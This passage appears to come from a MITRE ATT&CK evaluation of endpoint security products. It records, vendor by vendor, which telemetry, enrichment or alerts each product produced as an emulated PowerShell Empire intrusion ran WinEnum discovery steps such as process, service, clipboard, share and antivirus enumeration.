Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe. The telemetry was tainted by a trace detection on wscript.exe.
Enrichment
The capability enriched qprocess.exe with the correct ATT&CK Tactic (Discovery) and a suspicious indicator that software running on a system was queried.
Enrichment
The capability enriched qprocess.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (Process Discovery) and a suspicious indicator that QPROCESS was used to check active processes.
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched qprocess.exe executing with a related ATT&CK Technique (System Service Discovery).
Enrichment (Tainted)
The capability enriched the execution of qprocess.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert on wscript.exe.
RSA
Telemetry
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID).
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments.
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe and net1.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net start was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Services Discovery). The alert was tainted by a parent PowerShell alert.
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections.
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections.
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe).
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments.
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that Windows services were manipulated via sc.exe/net.exe.
General Behavior
A General Behavior alert was generated for a net or sc command executed through PowerShell. The alert was tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery).
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe.
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". The alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a previous suspicious PowerShell cmdlet alert.
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as an enumeration command called by a commonly abused causality group owner (CGO, wscript.exe). The data was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched net.exe executing as the execution of an enumeration command. The data was tainted by a parent alert on wscript.exe.
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID).
Carbon Black
Telemetry
Telemetry showed process execution of powershell.exe. The powershell.exe process loaded several non-default dynamically loaded libraries, which may indicate functionality used by the PowerShell script.
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating they identified a Specific Behavior for an unidentified PowerShell script running. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry
Telemetry showed the PowerShell script (.ps1) being written to the temp folder.
Specific Behavior (Delayed)
The OverWatch team generated a Specific Behavior alert indicating the PowerShell script was malicious. OverWatch is the managed threat hunting service.
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a malicious command, which was identified as the Invoke-WinEnum function. The alert also identified the PowerShell commands as suspicious and tagged them with the correct ATT&CK Technique (PowerShell) and Tactic (Execution). The alert was tainted by a parent PowerShell alert.
Telemetry (Tainted)
Telemetry showed the PowerShell Script module (.psm1) being written to the temp folder. The telemetry was tainted by a parent PowerShell alert.
Endgame
Telemetry (Tainted)
Telemetry showed the creation of the PowerShell Process (tainted by parent PowerShell alerts).
Specific Behavior (Tainted)
A Specific Behavior alert was generated for "PowerShell with Unusual Arguments" that coincided with the execution of WinEnum (tainted by parent PowerShell alerts). The alert also identified a related ATT&CK Technique (T1086 - PowerShell) and Tactic (Execution). From the alert, the Interactive Shell was used to analyze the PowerShell script and the function Invoke-WinEnum was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality.
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that a PowerShell command was run from the Empire process. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment
The capability enriched powershell.exe with an alert for PowerShell Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1086 - PowerShell).
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function.
GoSecure
Telemetry
Telemetry showed powershell.exe connecting to the domain controller 10.0.0.4 (Creeper), which coincided with the execution of WinEnum. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
Telemetry
Telemetry showed the PowerShell script (.ps1) being written to the temp folder, indicating the execution of a PowerShell script.
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence from PowerShell with several activities from the WinEnum cmdlet. The telemetry was tainted by the previous "Suspicious sequence of exploration activities" alert.
Specific Behavior
A Specific Behavior alert was generated for "A malicious PowerShell Cmdlet was invoked on the machine."
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing with command-line arguments as well as PowerShell module (.psm) and script (.ps1) files being written to disk. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands. The alert was tainted by a parent alert on wscript.exe.
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire WinEnum.
RSA
Telemetry
Telemetry showed PowerShell running and a PowerShell script being written to disk that coincided with the execution of WinEnum.
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of a PowerShell script with follow-on enumeration activity that coincided with the execution of the WinEnum module. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID).
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-UserInfo was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of user information.
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire UserInfo.
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum AD Group Memberships was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality.
FireEye
None
No detection capability demonstrated for this procedure, though telemetry showed loading of an assembly associated with accessing Active Directory security principals.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of AD group memberships.
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed powershell.exe connecting to the domain controller. This could indicate AD group information was being obtained, but this was not directly detected. The vendor indicated the capability sees the start of a PowerShell connection, but would not see additional commands after that start. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure.
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Password Last changed was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of password policy information. [1]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure.
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Last 5 files opened was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of recently opened files. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Interesting Files was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of interesting files. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command and OverWatch alerted on it as suspicious. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability. [1] [2] [3]
Cybereason
Telemetry (Tainted)
Telemetry showed the decoded powershell.exe function to gather clipboard data. The telemetry was tainted by a parent PowerShell alert. [1]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of a PowerShell sub-process and decoded the command within the capability to show Windows.Clipboard (tainted by parent PowerShell alerts). Though it does not count as part of the detection, the Interactive Shell could also be used to analyze the PowerShell execution and WinEnum Clipboard Contents was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
Indicator of Compromise (Delayed)
The Managed Defense Report indicated an Indicator of Compromise detection occurred because it identified that the attacker executed the Windows Clipboard capability in Empire. The capability separately showed a PowerShell Execution (Weak Signal) alert containing the encoded PowerShell command. This command could be decoded, but this was not counted as a separate detection because it was external to the capability. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of clipboard contents. [1] [2]
Indicator of Compromise
An Indicator of Compromise alert was generated for PowerShell Empire accessing the clipboard. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability. [1]
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Clipboard Data). [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. PowerShell telemetry showed execution of an encoded command and the script was decoded to Windows.Clipboard(...) outside of the capability, but this was not counted as a detection because it was external to the capability.
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-SysInfo was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of system information. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-SysInfo. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysImfo. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated operating system information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Windows Last Updated was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of Windows update information. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-HotFix. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-SysInfo was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of system information via a Registry query. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the enumeration of system information via a Registry query as suspicious. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysImfo. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Services was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of services. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-Service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Available Shares was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of available shares. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery). [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Mapped Network Drives was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of mapped network drives. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery). [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated logical disk information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum AV Solution was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of AV solutions. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Telemetry
Telemetry showed an event log for the WMI query of the system AV products. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Enrichment (Tainted)
The capability enriched powershell.exe activity with the action "attempted to find other installed security software." The enrichment was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2]
Telemetry (Tainted)
Telemetry showed powershell.exe executing WMI queries that indicated antivirus product information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Firewall Rules was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of firewall rules. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Security Software Discovery). [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-NetInfo-Network Adapters was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of network adapters. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched powershell.exe making a WMI query with a tag identifying the command as WMI enumerating adapters. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire NetInfo. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
